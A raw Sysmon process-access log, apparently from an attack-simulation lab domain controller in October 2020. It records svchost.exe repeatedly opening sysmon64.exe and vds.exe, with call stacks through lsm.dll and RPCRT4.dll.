08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001228Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001227Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001226Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001225Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001224Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001223Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001222Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001221Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B2-5F84-3500-000000007F01}3384C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001220Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001219Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001218Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001217Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001216Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001215Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001214Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001213Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001212Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001211Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001210Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001209Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001208Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001207Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001206Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001205Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 